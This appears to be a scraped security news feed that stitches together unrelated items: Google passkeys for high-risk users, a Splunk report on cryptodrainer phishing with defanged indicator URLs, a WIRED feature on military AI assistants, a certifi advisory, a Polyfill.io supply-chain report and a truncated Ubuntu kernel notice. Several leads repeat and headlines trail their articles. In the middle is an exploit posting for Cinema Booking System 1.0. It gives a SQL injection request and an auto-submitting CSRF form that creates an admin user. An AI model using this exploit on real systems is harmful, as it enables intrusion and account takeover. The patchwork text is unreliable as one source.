Google on Wednesday announced that it's making available passkeys for high-risk users to enroll in its Advanced Protection Program (APP).
"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.
Passkeys are considered a more secure and phishing-resistant alternative to passwords. Based on

Cybersecurity / Phishing Attack

Google on Wednesday announced that it's making available passkeys for high-risk users to enroll in its Advanced Protection Program (APP).

"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.

Passkeys are considered a more secure and phishing-resistant alternative to passwords. Based on the FIDO Authentication standard, the technology is designed to secure online accounts against potential takeover attacks by ditching passwords in favor of biometrics or a PIN.

Passkeys can simultaneously act as a first- and second-factor, entirely obviating the need for a password. Earlier this May, the tech giant revealed that passkeys are being used by over 400 million Google accounts.

High-risk users, who are at an elevated exposure to cyber-attacks because of who they are and what they do (e.g., journalists, elected officials, political campaign staff, human rights workers, and business leaders), can check if they have a compatible device and browser and complete the enrollment process.

"We also require you to add recovery options during enrollment (e.g. a phone number and email, or another passkey or security key), a combination of which will help you regain access to your account if you get locked out," Chatterjee said.

Google further said it's partnering with Internews to provide journalists and human rights workers with security support. The program spans 10 countries, including Brazil, Mexico, and Poland.

The development comes as Google said it intends to expand dark web reports to any user with a Google account starting later this month to check if their information has been leaked on the darknet. The feature was previously limited to Google One subscribers.

"Dark web report will become available to all users with a consumer Google Account," it noted in a support document. "Dark web report is integrated with Results about you as a combined solution to help users protect their online presence."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Adds Passkeys to Advanced Protection Program for High-Risk Users

Google is bringing the password-killing “passkey” tech to its Advanced Protection Program users more than a year after rolling them out broadly.

The password killers known as “passkeys” are now available to users of Google's Advanced Protection Program, which works to add an additional layer of account protection for people who fear that they could face targeted digital attacks. The company is more than a year into supporting passkeys for all regular individual accounts and made them the default login option in October. But Google waited to offer passkeys to APP users until it was sure the community was ready to take the step.

APP users typically have a public-facing position or do controversial work. Anyone can enroll for free, but enabling Advanced Protection involves strict requirements for adding multi-factor authentication to an account, which previously involved hardware tokens. With the addition of passkeys, though, APP project manager Shuvo Chatterjee points out that APP's defensive benefits will now be more usable and accessible to people around the world.

“Security keys are super-duper strong. They are an un-phishable factor,” Chatterjee told WIRED ahead of today's announcement. “And yet it is still a thing that people have to carry around. They lose it, they cost a lot. So a request that we keep getting from the field is, are there other ways by which we can get the same level of security, but from something that’s more convenient and something we already have? Passkeys are something \[that\] works with the threat profile that our high-risk users deal with.”

With digital crime and online fraud exploding around the web, tech giants have stepped up their push in recent years to secure accounts and promote passkeys, a cryptographic authentication system, as a more-secure replacement for the scourge of passwords. Passkeys are stored locally on your devices (or can be stored on hardware tokens that support the protocol known as FIDO2) and are guarded by a fingerprint, face scan, or pin. Advanced Protection will also still offer users the option of enabling the service with traditional two-factor authentication where the hardware token is the second factor.

Courtesy of Google

If you wish to join, use the Advanced Protection Program enrollment page, click “Get started,” and walk through the process to enroll with a passkey or a physical security key. While APP is meant to keep everyone out of your account, Chatterjee also emphasizes that the program offers recovery options that users should set up so they can regain access if they are ever locked out of their own account.

The passkey rollout hasn't always been straightforward, but they are gradually proliferating around the world. Google said in April that passkeys were used for authentication more than a billion times across more than 400 million Google accounts in their first year of deployment. And the company says that each day, users authenticate with passkeys more often than SMS one-time codes or one-time codes generated on apps like Google Authenticator.

For Advanced Protection Program users who want the highest level of protection, though, the option to start using passkeys will mean less overhead and more possibilities.

“We’ve encountered many people who just don’t have access to security keys,” Chatterjee says. “They can’t get them in their country, they’re a journalist traveling in a war zone, they’re a campaign worker hopping from town to town. They don’t have security keys with them, but they have their phone with them. There are many situations where having the flexibility and security of passkeys is really important to this population.”

Google Is Adding Passkey Support for Its Most Vulnerable Users

In recent months, a surge in cryptodrainer phishing attacks has been observed, targeting cryptocurrency holders with sophisticated schemes aimed at tricking them into divulging their valuable credentials.

Tuesday, July 9, 2024 08:00

_By_ _Teoderick Contreras_ _and_ _Jose Hernandez_ _of Splunk, with contributions from the Splunk Threat Research Team._  

Cryptodrainer scams have emerged as a significant threat in the cryptocurrency ecosystem, targeting unsuspecting individuals with the promise of easy profits while covertly siphoning their digital assets.  

Initially, cryptodrainer scams primarily manifested as fraudulent investment schemes, promising high returns on investments in dubious projects or fake initial coin offerings (ICOs). These scams exploited the speculative nature of cryptocurrency markets, luring investors with the allure of quick riches and revolutionary technology. However, instead of delivering on their promises, scammers absconded with investors' funds. 

An example of a cryptodraining scam spread on a Jamaican news outlet’s X account in 2023 after the account was hacked. 

Cryptodrainer phishing scams targeting cryptocurrency holders have become increasingly sophisticated, with scammers employing social engineering techniques to trick users into divulging their private keys or login credentials. These stolen assets were then swiftly drained from victims' wallets, often leaving them with little recourse for recovery. 

In recent months, a surge in cryptodrainer phishing attacks has been observed, targeting cryptocurrency holders with sophisticated schemes aimed at tricking them into divulging their valuable credentials. These tactics involve deceptive URLs, carefully crafted to resemble legitimate cryptocurrency platforms, enticing unsuspecting users to input their sensitive login information. 

One particularly concerning trend is the emergence of phishing campaigns proliferating across various social media platforms, including X (Twitter). In these instances, compromised accounts, likely hijacked by cybercriminals, are used as unwitting conduits to deliver the malicious URLs to a wider audience. The compromised accounts lend an air of legitimacy to the fraudulent scheme, thereby increasing the likelihood of unsuspecting users falling victim to the scam. 

These types of platforms have long been rife for abuse and scams. Cisco Talos has previously highlighted how various aspects of “Web 3” such as the metaverse and smart contracts have been abused to trick users into emptying their cryptocurrency wallets. Malicious Google Forms documents have also been used as an attack vector for these scams.  

**Anatomy of a crytodrainer attack **

Splunk researchers used the Splunk Attack Analyzer to gain insights into the anatomy of this phishing campaign, which we believe follows the same general infection method and attack pattern of cryptodrainer scams. 

Below are a few examples of phishing website pages designed to mimic legitimate cryptocurrency platforms, enticing users to disclose their cryptocurrency login credentials. 

Phishing site web pages. 

Splunk expanded our repository of potential cryptodrainer phishing URLs using the Attack Analyzer. One such example is _hxxp\[://\]nfts-manta\[.\]network/_, a site identified and flagged as a phishing site by several anti-virus products, according to VirusTotal. 

A phishing site in VirusTotal. 

Splunk Attack Analyzer also provides a comprehensive overview, including the landing page screenshot of the phishing site, potential URL link redirections, detections and related artifacts, facilitating further in-depth analysis. 

A screenshot of Splunk Attack Analyzer. 

Upon accessing this phishing site, users are prompted to connect their cryptocurrency wallets to purportedly claim tokens. A common method observed for wallet connection involves scanning a QR code using a mobile phone. This QR code may seemingly link to the desired cryptocurrency wallet app, offering the illusion of a seamless login process. In reality, this action grants the phishing site access to the user's login credentials, enabling the unauthorized draining of their cryptocurrency wallet. 

A phishing website posing as Manta, a cryptocurrency application.

A QR code displayed on the Manta phishing site. 

**Why should you care? **

Understanding and staying vigilant against cryptodrainer scams is important for safeguarding your financial well-being and data security.  

These scams, often executed through phishing tactics, pose significant risks to individual's finances and personal information if they are invested at all in cryptocurrency.  

By remaining informed about the tactics employed by scammers, you can take proactive measures to protect yourself and prevent potential financial losses. Additionally, spreading awareness about these scams helps mitigate their impact by empowering others to recognize and avoid falling victim to fraudulent schemes.  

Here are a few tips for spotting possible cryptocurrency scams like the ones outlined above: 

*   Carefully consider and thoroughly research before registering for, or investing, in any cryptocurrency that promises quick and significant returns. High-reward opportunities often come with high risks, and many such promises may be scams. As always, if it seems too good to be true, it probably is. 
*   Always verify the legitimacy of the website before providing your personal information or registering your cryptocurrency accounts or wallet. Look for signs of credibility such as secure URLs (https), professional design and positive reviews from trusted sources. 
*   Ensure that your security products are consistently updated to detect and block known malicious websites that employ these deceptive tactics. Regular updates provide the latest protection against evolving threats and scams in the cryptocurrency space. 

By following these guidelines, you can better protect yourself from the risks associated with investing in cryptocurrencies and engaging with online platforms. 

**Coverage **

The following Splunk SOAR playbooks integrate with Splunk Attack Analyzer and other sandbox tools, allowing users and admins to easily triage and identify this type of activity in a given environment. 

Accepts URL link, domain or vault\_id (hash) to be detonated using Splunk Attacker (SAA) API connector. This playbook produces a normalized output for each user and device. 

Leverages Splunk technologies to determine if a .eml or .msg file in the vault is malicious, whether or not it contained suspect URLs or Files, and who may have interacted with the IoCs (emails, URLs or files). 

Automatically dispatches input playbooks with the 'sandbox' tag. This will produce a merge report and indicator tag for each input. 

Below is a list of other IOCs related to cryptodrainer scams.  

    hxxps://123-bti[.]pages[.]dev/ 
    hxxps://giveaway-omnicat[.]pages[.]dev/ 
    hxxps://visit-ait[.]pages[.]dev/ 
    hxxps://enrol-manta[.]network/ 
    hxxp://nfts-manta[.]network/ 
    hxxp://nftbonus-manta[.]network/ 
    hxxps://sea-manta[.]network/ 
    hxxps://sale-starknet[.]io/ 
    hxxps://gain-manta[.]pages[.]dev/ 
    hxxps://frame-343[.]pages[.]dev/ 
    hxxps://gainsatoshi[.]pages[.]dev/ 
    hxxps://visit-dymension[.]pages[.]dev/ 
    hxxps://manta11[.]pages[.]dev/ 
    hxxps://explore-satoshi[.]pages[.]dev/ 
    hxxps://governance-mantanetwork[.]pages[.]dev/ 
    hxxps://accept-satoshivmio[.]pages[.]dev/ 
    hxxps://preregistration-satoshivmio[.]pages[.]dev/ 
    hxxps://receive-altlayerio[.]pages[.]dev/ 
    hxxps://bonus-8u0[.]pages[.]dev/ 
    hxxps://reveal-manta[.]pages[.]dev/ 
    hxxp://acquire-satoshivm[.]io/ 
    hxxps://farcana123[.]pages[.]dev/ 
    hxxps://enlist-jup[.]app/ 
    hxxps://distributedymension[.]pages[.]dev/ 
    hxxps://visit-lineabuild[.]pages[.]dev/ 
    hxxps://1-67c[.]pages[.]dev/ 
    hxxps://registryzetachain[.]pages[.]dev/ 
    hxxps://gratitude-satoshivm[.]pages[.]dev/ 
    hxxps://whitelist-woo[.]pages[.]dev/ 
    hxxps://join-jupapp[.]pages[.]dev/ 
    hxxps://million-satoshivmio[.]pages[.]dev/ 
    hxxps://achieve-altlayer[.]pages[.]dev/ 
    hxxps://follow-satoshivm[.]io/

How do cryptocurrency drainer phishing scams work?

The US military has abandoned its half-century dream of a suit of powered armor in favor of a “hyper enabled operator,” a tactical AI assistant for special operations forces.

The day is slowly turning into night, and the American special operators are growing concerned. They are deployed to a densely populated urban center in a politically volatile region, and local activity has grown increasingly frenetic in recent days, the roads and markets overflowing with more than the normal bustle of city life. Intelligence suggests the threat level in the city is high, but the specifics are vague, and the team needs to maintain a low profile—a firefight could bring known hostile elements down upon them. To assess potential threats, the Americans decide to take a more cautious approach. Eschewing conspicuous tactical gear in favor of blending in with potential crowds, an operator steps out into the neighborhood's main thoroughfare to see what he can see.

With a click of a button, the operator sees … everything. A complex suite of sensors affixed to his head-up display start vacuuming up information from the world around him. Body language, heart rates, facial expressions, and even ambient snatches of conversation in local dialects are rapidly collected and routed through his backpack supercomputers for processing with the help of an onboard artificial intelligence engine. The information is instantly analyzed, streamlined, and regurgitated back into the head-up display. The assessment from the operators’ tactical AI sidekick comes back clear: There are a series of seasonal events coming into town, and most passersby are excited and exuberant, presenting a minimal threat to the team. Crisis averted—for now.

This is one of many potential scenarios repeatedly presented by Defense Department officials in recent years when discussing the future of US special operations forces, those elite troops tasked with facing the world’s most complex threats head-on as the “tip of the spear” of the US military. Both defense officials and science-fiction scribes may have envisioned a future of warfare shaped by brain implants and performing enhancing drugs, or a suit of powered armor straight out of _Starship Troopers_, but according to US Special Operations Command, the next generation of armed conflict will be fought (and, hopefully, won) with a relatively simple concept: the “hyper enabled operator.”

**More Brains, Less Brawn**

First introduced to the public in 2019 in an essay by officials from SOCOM’s Joint Acquisition Task Force (JATF) for Small Wars Journal, the hyper-enabled operator (HEO) concept is the successor program to the Tactical Assault Light Operator Suit (TALOS) effort that, initiated in 2013, sought to outfit US special operations forces with a so-called “Iron Man” suit. Inspired by the 2012 death of a Navy SEAL during a hostage rescue operation in Afghanistan, TALOS was intended to improve operators’ survivability in combat by making them virtually resistant to small-arms fire through additional layers of sophisticated armor, the latest installment of the Pentagon’s decades-long effort to build a powered exoskeleton for infantry troops. While the TALOS effort was declared dead in 2019 due to challenges integrating its disparate systems into one cohesive unit, the lessons learned from the program gave rise to the HEO as a natural successor.

The core objective of the HEO concept is straightforward: to give warfighters “cognitive overmatch” on the battlefield, or “the ability to dominate the situation by making informed decisions faster than the opponent,” as SOCOM officials put it. Rather than bestowing US special operations forces with physical advantages through next-generation body armor and exotic weaponry, the future operator will head into battle with technologies designed to boost their situational awareness and relevant decisionmaking to superior levels compared to the adversary. Former fighter pilot and Air Force colonel John Boyd proposed the “OODA loop” (observe, orient, decide, act) as the core military decisionmaking model of the 21st century; the HEO concept seeks to use technology to “tighten” that loop so far that operators are quite literally making smarter and faster decisions than the enemy.

“The goal of HEO,” as SOCOM officials put it in 2019, “is to get the right information to the right person at the right time.”

To achieve this goal, the HEO concept calls for swapping the powered armor at the heart of the TALOS effort for sophisticated communications equipment and a robust sensor suite built on advanced computing architecture, allowing the operator to vacuum up relevant data and distill it into actionable information through a simple interface like a head-up display—and do so “at the edge,” in places where traditional communications networks may not be available. If TALOS was envisioned as an “Iron Man'' suit, as I previously observed, then HEO is essentially Jarvis, Tony Stark’s built-in AI assistant that’s constantly feeding him information through his helmet’s head-up display.

“\[JATF\] is targeting technologies to deliver cognitive overmatch to SOF operators working at the edge in austere and contested environments in coordination with and working through partners and allies,” SOCOM spokesperson James O. Gregory tells WIRED, invoking a general description of the program from the command’s website. “Such technologies will enable tactical teams of SOF operators to intuitively use information made available by next-generation sensors, networks, computing, and communication systems to rapidly build situation awareness. It will also help make timely, well-informed decisions, and take actions inside an adversary's ability to react.”

**Enter the Gray Zone**

So what does the HEO actually look like today, five years after its introduction into the US military’s tactical lexicon? Given the sensitive (and somewhat notional) nature of the effort, details remain scarce, and SOCOM officials have remained relatively tight-lipped about its progress. But according to SOCOM’s Gregory, the scenario and concept the HEO seeks to address has “evolved” from what officials previously described to reporters at the program’s inception. Indeed, rather than augmenting warfighters deployed to active combat zones, SOCOM officials envision something more like a casually dressed operator vacuuming up information on a busy urban avenue through a Google Glass-like eyepiece and sizing up the situation—in other words, more James Bond than Tony Stark.

“The operational environment for the JATF’s current efforts is in the competition phase of warfare, in permissive or semi-permissive locations,” Gregory says. (A permissive environment is generally defined as an operational environment where US forces have the backing of a host country’s security apparatus, according to the US Army, while a “semi-permissive” environment is potentially hostile and local support is often not reliable.) No longer just another tool for a kinetic assault, the HEO will help elite troops operating in the “gray zone” between peace and conflict.

A SOCOM broad agency announcement—a general request for research and development proposals from the defense industry—published in 2020 and updated as recently as November 2023 details the JATF’s push for advanced technologies designed to boost situational awareness. Those technologies include: intelligence, surveillance, and reconnaissance capabilities “without substantial manning or networking resources” (the aforementioned “at the edge”); sophisticated sensors capable of “iris, facial, anatomical measures, gestures, gait, heartbeat, electromagnetic signals, deoxyribonucleic acid \[DNA\], and microbiome recognition”; low-visibility communications systems; and “data visualizations” that “permit \[operators\] to receive and intuitively understand networked information from communication, computing, and sensor systems,” among others. In short, the HEO envisions systems that enable the constant, real-time collection and distillation of data into actionable intel that could potentially mean the difference between life and death in an uncertain situation.

**Edge Case**

Envisioning a suite of aspirational capabilities is one thing; actually building them is another thing entirely. In terms of developing new products, Gregory says that the HEO effort has remained focused on three major experimental technology areas for the last several years: sensing and edge computing, architecture and analysis, and language translation.

“Sensing and edge computing” generally refers to the collection and processing of data from a variety of sources, but it also refers to the specialized computing power that operators need not only to function “at the edge,” but to actually run the AI-enabled software that will form the foundation of the HEO.

“Emerging technologies and solutions in artificial intelligence/machine learning require specialized ‘compute’ hardware, as traditional CPU-based devices are insufficient,” Gregory says. “We aim to feature a manpack device with a graphics processing unit, neural processing engine, and/or tensor processing unit capabilities. This will provide the necessary platform to leverage advanced technologies like language translation and other solutions at the edge, even when disconnected from the cloud.”

That computing power forms the basis for the “architecture and analysis” element focused on the rapid assessment and presentation of data to operators in the field. Gregory tells WIRED that, to support this element, the command has developed “a flexible \[system\] architecture that fuses data from various sources and media types” into an easily digestible format for operators to assess and act upon.

As for language translation, that’s self-explanatory. SOCOM believes that “prior to any hostilities ever occurring, clear communication can greatly enhance development of our long-term relationships,” Gregory says. “Voice-to-voice translation enables operators to communicate more effectively than relying on often scarce interpreters in the field. Even though many SOF personnel are multilingual, they are frequently deployed to regions with different languages or dialects.”

In line with these experimental technology areas, SOCOM has reportedly concentrated on six immediate lines of product development, per C4ISRNet: the “operator-worn kit” that includes both sensors and onboard computer processing power; application development resources; a unique, mission-agnostic system architecture; the “human-machine interface” that’s generally envisioned as a digital head-up display; a product called “information realization” that likely involves the clear presentation of data; and beyond-line-of-sight (BLoS) communications designed to keep troops in contact with their commanders (and each other) in satellite-denied environments.

According to Gregory, the command has gradually rolled out a handful of fresh capabilities from the HEO effort in recent years. In 2021, SOCOM announced that two products—a BLoS communications system and an unspecified “integrated situational awareness tool”—were transitioning into official programs of record, as Janes reported at the time. Gregory confirmed to WIRED that the BLoS system consists of “a steerable gimble antenna system that enhances the functionality” of the command’s SOF deployable nodes, a family of advanced satellite communications systems. The spokesperson also confirmed that the situational awareness tool, known as SEEKER, is an app that “enables advisers to build advanced situational awareness, thereby allowing them to select actions with an eye toward the broader situation rather than just the immediately apparent problem.” It’s unclear if the latter is related to the “automate the analyst” effort the command kicked off in 2020 to provide operators with an autonomous AI assistant.

Then there’s the “visual environment translation” system that’s designed to convert foreign language inputs into clear English in real time. Known overarchingly as the Versatile Intelligent Translation Assistant (VITA), the system encompasses both a visual environment translation effort and voice-to-voice translation capabilities and is “the most mature” of the JATF’s experimental technology areas, according to SOCOM. VITA is essentially “a voice-to-voice translation engine that functions offline on GPU-enabled devices,” Gregory says, small enough to be carried in the field on a laptop-tethered smartphone or wearable device and “engage in effective conversations where it was previously impossible.” And not only has VITA successfully demonstrated Russian, Chinese Mandarin, and Ukrainian language translation capabilities during testing, but the system has even been deployed to two undisclosed theaters of operations already.

“The visual translation component enhances situational awareness by translating video images, such as street signs, graffiti, and other written texts, in real time,” Gregory says. “Operators can use their phone cameras to scan their surroundings and understand foreign languages instantly.”

VITA provides US special operations forces with “a high-quality translation capability that is not reliant on the cloud or local interpreters, thus significantly reducing risk and logistical costs while increasing operational range and effectiveness for USSOF and our partners,” Gregory says. “The JATF is currently working with industry partners to reduce the size of the hardware and transition it into a SOF Program Executive Office for eventual fielding.” (And that language translation may not be restricted to a mobile device for long: According to SOCOM’s fiscal year 2025 budget request published in March, the command is still plowing ahead with head-mounted sensors and an augmented-reality HUD to present these functions right before operators’ eyes.)

**Field Work**

To US military planners, the HEO concept is promising: According to one Army assessment, the successful adoption of the system could potentially increase operator survivability far beyond that provided by the additional body armor of the TALOS program. But like other potentially revolutionary technology ventures, there’s certainly the possibility that HEO could end up a science fiction dream that collapses under the weight of its own technical complexity. And there’s no guarantee that operators will embrace the new technology seamlessly in the first place: Although VITA has shown operational promise, it’s unclear if other HEO products will prove intuitive enough to actually augment operators in the field rather than burden them with some complicated newfangled system. As Heinlein put it so aptly in _Starship Troopers_: “If you load a mud foot down with a lot of gadgets that he has to watch, somebody a lot more simply equipped—say with a stone ax—will sneak up and bash his head in while he is trying to read a vernier.”

Perhaps, like TALOS, the promise of a tactical AI assistant like Tony Stark’s Jarvis sidekick may prove simply too ambitious for military engineers to realize in a fully formed product. But even if the HEO effort ends up only fielding, say, the VITA language translation tool, it will still represent a major boost in capabilities for US special operators deployed abroad. The day is slowly turning into night, but American commandos own the night and, with the help of the HEO, will do so well into the next conflict.

AI-Powered Super Soldiers Are More Than Just a Pipe Dream

Plus: Researchers uncover a new way to expose CSAM peddlers, OpenAI suffered a secret cyberattack, cryptocurrency thefts jump in 2024, and Twilio confirms hackers stole 33 million phone numbers.

Proton, the company behind Proton Mail, launched an end-to-end encrypted alternative to Google Docs, seeking to compete with the cloud giant on privacy. We broke down how Apple is taking a similar approach with its implementation of AI, using a system it calls Private Cloud Compute in its new Apple Intelligence features.

In other news, we dug into how the US bans on TikTok and Kaspersky software, despite their national security justifications, pose a threat to internet freedom. We went inside a crash course for US diplomats on cybersecurity, privacy, surveillance, and other digital threats. And we published an in-depth investigation into the origins of the world’s most popular 3D-printed gun, which revealed that its creator was a self-described “incel” with fantasies of right-wing terror.

But that’s not all. Each week, we round up the security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The giant hack against Ticketmaster may have taken another twist. In June, criminal hackers claimed they had stolen 560 million people’s information from the ticketing company owned by Live Nation. The company has since confirmed a breach, saying its information was taken from its Snowflake account. (More than 165 Snowflake customers were impacted by attacks on the cloud storage company that exploited a lack of multi-factor authentication and stolen login details).

Now in a post on cybercrime marketplace BreachForums, a hacker going by the name of Sp1d3rHunters is threatening to publish more data from Ticketmaster. The account claims to be sharing 170,000 ticket barcodes for upcoming Taylor Swift gigs in the US during October and November. The hacker demanded Ticketmaster “pay us $2million USD” or it will leak “680 million” users’ information and publish millions more event barcodes, including for concerts by artists such as Pink and Sting, and sporting events such as NFL games and F1 races.

The claims appear to be dubious, however, as Ticketmaster's barcodes aren't static, according to the company. “Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied,” a Ticketmaster spokesperson tells WIRED in a statement. The spokesperson adds that the company has not paid any ransom or engaged with the hackers’ demands.

Hacker groups are known to lie, exaggerate, and overinflate their claims as they try to get victims to pay. The 680 million customers that Sp1d3rHunters claimed to have data on is higher than the original figure provided when the Ticketmaster breach was first claimed, and neither number has been confirmed. Even if victims do decide to pay, hackers can still keep the data and try to extort companies for a second time.

Despite the breach at Ticketmaster originally being publicized in June, the company has only recently begun emailing customers alerting them to the incident, which happened between April 2 and May 18 this year. The company says the database accessed may include emails, phone numbers, encrypted credit card information, and other personal information.

**Stolen Login Details Can Unmask Child Abuse Viewers, Researchers Say**

In recent years, there’s been a sharp uptick in cybercriminals deploying infostealers. This malware can grab all of the login and financial details that someone enters on their machine, which hackers then sell to others who want to exploit the information.

Cybersecurity researchers at Recorded Future have now published proof-of-concept findings showing these stolen login details can be used to potentially track down people visiting dark-web child sexual abuse material (CSAM) sites. Within infostealer logs, the researchers say they were able to find thousands of login details for known CSAM websites, which they could then cross-reference with other details and identify the potential real-world names connected to the abusive website logins. The researchers reported details of individuals to law enforcement.

Hackers Leaking Taylor Swift Tickets? Don’t Get Your Hopes Up

Certifi 2024.07.04 removes root certificates from "GLOBALTRUST" from the root store. These are in the process of being removed from Mozilla's trust store.

GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI).

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-39689

**Certifi removes GLOBALTRUST root certificate**

Low severity GitHub Reviewed Published Jul 4, 2024 in certifi/python-certifi • Updated Jul 5, 2024

**Package**

pip certifi (pip)

**Affected versions**

\>= 2021.05.30, < 2024.07.04

**Patched versions**

2024.07.04

Certifi 2024.07.04 removes root certificates from "GLOBALTRUST" from the root store. These are in the process of being removed from Mozilla's trust store.

GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues". Conclusions of Mozilla's investigation can be found here.

**References**

*   GHSA-248v-346w-9cwc
*   certifi/python-certifi@bd81538

Published to the GitHub Advisory Database

Jul 5, 2024

GHSA-248v-346w-9cwc: Certifi removes GLOBALTRUST root certificate

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities.:. Google Dorks .:.intitle:Cinema Booking System.:. Date: July 5, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://www.phpjabbers.com/.:. Product -> https://www.phpjabbers.com/cinema-booking-system/.:. Product Version -> 1.0.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| #####################"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."Vulnerability 1: Authenticated SQL InjectionGET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestConnection: keep-aliveReferer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndexCookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952Priority: u=1Response:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESCLIMIT 0, 10' at line 5===========================================================================================Vulnerability 2: Cross Site Request ForgeryRisk:Privilege EscalationProof of concept:<h1>CSRF PoC</h1>    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">        <input type="hidden" name="user_create" value="1">        <input type="hidden" name="role_id" value="1">        <input type="hidden" name="email" value="test@test.com">        <input type="hidden" name="password" value="123123">        <input type="hidden" name="name" value="test">        <input type="hidden" name="phone" value="">        <input type="hidden" name="status" value="T">    </form>    <script type="text/javascript">        document.getElementById('csrfForm').submit();    </script></body></html>

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

The supply chain attack targeting widely-used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack

Supply Chain Attack / Malware

The supply chain attack targeting widely-used Polyfill\[.\]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.

This includes references to "https://cdn.polyfill\[.\]io" or "https://cdn.polyfill\[.\]com" in their HTTP responses, the attack surface management firm said.

"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."

Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question.

Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.

The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.

The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.

While the operators attempted to relaunch the service under a different domain named polyfill\[.\]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill\[.\]site and polyfillcache\[.\]com –the latter remains up and running.

On top of that, a more extensive network of potentially related domains, including bootcdn\[.\]net, bootcss\[.\]com, staticfile\[.\]net, staticfile\[.\]org, unionadjs\[.\]com, xhsbpza\[.\]com, union.macoms\[.\]la, newcrbpc\[.\]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.

"One of these domains, bootcss\[.\]com, has been observed engaging in malicious activities that are very similar to the polyfill\[.\]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.

"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."

The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies

Ubuntu Security Notice 6872-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6872-1July 04, 2024linux, linux-gcp, linux-gcp-6.5, linux-laptop, linux-nvidia-6.5,linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-laptop: Linux kernel for Lenovo X13s ARM laptops- linux-raspi: Linux kernel for Raspberry Pi systems- linux-gcp-6.5: Linux kernel for Google Cloud Platform (GCP) systems- linux-nvidia-6.5: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystem:   - Netfilter;(CVE-2024-26809, CVE-2024-26643, CVE-2024-26925, CVE-2024-26924)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10   linux-image-6.5.0-1018-laptop   6.5.0-1018.21   linux-image-6.5.0-1019-raspi    6.5.0-1019.22   linux-image-6.5.0-1023-gcp      6.5.0-1023.25   linux-image-6.5.0-42-generic    6.5.0-42.42   linux-image-6.5.0-42-generic-64k  6.5.0-42.42   linux-image-gcp                 6.5.0.1023.25   linux-image-generic             6.5.0.42.42   linux-image-generic-64k         6.5.0.42.42   linux-image-generic-lpae   